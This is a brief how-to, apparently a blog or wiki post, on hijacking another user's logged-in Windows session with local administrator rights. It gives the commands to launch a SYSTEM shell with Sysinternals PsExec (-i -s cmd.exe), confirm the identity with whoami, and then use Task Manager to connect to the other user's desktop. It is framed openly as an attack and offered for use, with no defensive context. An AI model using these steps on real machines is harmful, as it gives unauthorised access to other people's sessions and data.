Purpose: To hijack a local windows session (any user)
Requirements: Local administrator rights
Even with administrator rights, you can not impersonate (or hijack) a another user. With this attack you gain full control over a locally logged user account.
Download SysInternal’s PsExec tool from here. Extract it to a folder of your choice and launch the elevated command prompt:
> cd C:\SysinternalsSuite > PsExec.exe -i -s cmd.exe PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com
Change to a newly launched command prompt:
> whoami nt authority\system > taskmgr
Select the logged in user in the Task Manager and connect to the user’s desktop.